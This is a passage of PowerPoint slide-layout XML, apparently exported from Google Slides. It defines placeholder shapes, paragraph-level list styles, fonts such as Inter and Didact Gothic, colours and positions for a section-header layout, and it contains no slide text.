            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr sz="2300"/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168" name="Google Shape;168;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="7" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2955938" y="2444306"/>
            <a:ext cx="3398700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="B9D8EB"/>
              </a:buClr>
              <a:buSzPts val="1700"/>
              <a:buFont typeface="Inter"/>
              <a:buNone/>
              <a:defRPr b="1" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="B9D8EB"/>
                </a:solidFill>
                <a:latin typeface="Inter"/>
                <a:ea typeface="Inter"/>
                <a:cs typeface="Inter"/>
                <a:sym typeface="Inter"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
              <a:defRPr>
                <a:latin typeface="Inter Light"/>
                <a:ea typeface="Inter Light"/>
                <a:cs typeface="Inter Light"/>
                <a:sym typeface="Inter Light"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="169" name="Google Shape;169;p16"/>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a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8">
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>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1_Section Header 2">
  <p:cSld name="11_Section Header_2">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="170" name="Shape 170"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="171" name="Google Shape;171;p17"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9165900" cy="2506800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000D74"/>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="1400" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="o"/>
              <a:defRPr b="0" i="0" sz="1200" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="NTR"/>
              <a:buChar char="—"/>
              <a:defRPr b="0" i="0" sz="1100" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" marR="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="accent1"/>
              </a:buClr>
              <a:buSzPts val="900"/>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:defRPr b="0" i="0" sz="900" u="none" cap="none" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5"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6pPr>
            <a:lvl7pPr lvl="6"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7pPr>
            <a:lvl8pPr lvl="7"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8pPr>
            <a:lvl9pPr lvl="8"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9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Google Shape;172;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1095075"/>
            <a:ext cx="9144000" cy="316800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="lt1"/>
              </a:buClr>
              <a:buSzPts val="2700"/>
              <a:buNone/>
              <a:defRPr sz="2700">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFil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173" name="Google Shape;173;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4051119" y="4738069"/>
            <a:ext cx="4460700" cy="438000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="ctr" bIns="68575" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="68575">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="000D74"/>
                </a:solidFill>
                <a:latin typeface="Didact Gothic"/>
                <a:ea typeface="Didact Gothic"/>
                <a:cs typeface="Didact Gothic"/>
                <a:sym typeface="Didact Gothic"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="174" name="Google Shape;174;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="18096" l="120" r="-120" t="41082"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9165829" cy="2506723"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="175" name="Google Shape;175;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1451027" y="3618413"/>
            <a:ext cx="6408300" cy="2951700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="34275" lIns="68575" spcFirstLastPara="1" rIns="68575" wrap="square" tIns="34275">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr indent="-317500" lvl="0" marL="457200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr indent="-317500" lvl="1" marL="914400" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="o"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr indent="-317500" lvl="2" marL="1371600" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="—"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-317500" lvl="3" marL="1828800" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-317500" lvl="4" marL="2286000" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr indent="-317500" lvl="5" marL="2743200" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-317500" lvl="6" marL="3200400" rtl="0" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Inter ExtraLight"/>
              <a:buChar char="•"/>
              <a:defRPr>
                <a:latin typeface="Inter ExtraLight"/>
                <a:ea typeface="Inter ExtraLight"/>
                <a:cs typeface="Inter ExtraLight"/>
                <a:sym typeface="Inter ExtraLight"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-317500" lvl="7" marL="3657600" rtl="0" algn="ctr">
